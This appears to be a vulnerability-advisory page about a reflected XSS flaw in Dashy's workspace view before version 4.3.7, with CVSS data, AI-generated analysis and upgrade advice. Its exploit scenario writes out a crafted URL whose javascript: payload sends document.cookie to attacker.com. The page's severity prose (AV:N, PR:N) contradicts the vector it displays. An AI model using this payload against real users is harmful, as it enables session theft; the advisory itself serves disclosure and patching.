Severity by source
AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Exploit delivery is a remotely-sent URL (AV:N); attacker requires no Dashy credentials (PR:N); victim must actively click the link (UI:R); impact is partial confidentiality and integrity within the Dashy origin only.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Dashy is a self-hostable personal dashboard. Prior to 4.3.7, Dashy's workspace view trusts the url query parameter and assigns it directly to an iframe source without scheme validation. If a logged-in user opens a crafted workspace link containing a javascript: URL, JavaScript runs on the Dashy origin and can read same-origin browser data, interact with the Dashy DOM, and send requests as the victim. This issue is fixed in version 4.3.7.
AnalysisAI
Reflected XSS in Dashy's workspace view allows a remote attacker to execute arbitrary JavaScript in the victim's browser within the Dashy origin by tricking an authenticated user into visiting a crafted URL containing a javascript: scheme in the url query parameter. All Dashy releases prior to 4.3.7 are affected. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires two concrete conditions: (1) the victim must be an authenticated, currently logged-in Dashy user at the time they open the crafted link - unauthenticated sessions are not exploitable; and (2) the victim must actively open a specially crafted URL that places a javascript: payload in the url query parameter of the Dashy workspace view endpoint. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The vendor-assigned CVSS 3.9 (Low) applies AV:L (Local), likely reflecting Dashy's typical deployment as a locally-accessible or home-network service. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies a target running a personal Dashy instance and crafts a URL such as https://dashy.example.com/workspace?url=javascript:fetch('https://attacker.com/?c='+document.cookie), then delivers it to the victim via a phishing email or message. When the logged-in victim clicks the link, the javascript: payload executes within the Dashy origin, exfiltrating session cookies or other same-origin data to the attacker-controlled server. … |
| Remediation | Upgrade Dashy to version 4.3.7, which patches the vulnerability by adding scheme validation to the url query parameter before it is assigned as the iframe src attribute; the release is available at https://github.com/lissy93/dashy/releases/tag/4.3.7. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
A vulnerability classified as critical has been found in Lissy93 Dashy 2.1.1. Rated medium severity (CVSS 4.3), this vul
Unauthorized configuration write in Dashy self-hosted dashboard (versions prior to 4.0.8) lets unauthenticated users or
Stored XSS via unsanitized `javascript:` URI injection in the Dashy RSS Feed widget (src/components/Widgets/RssFeed.vue)
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42103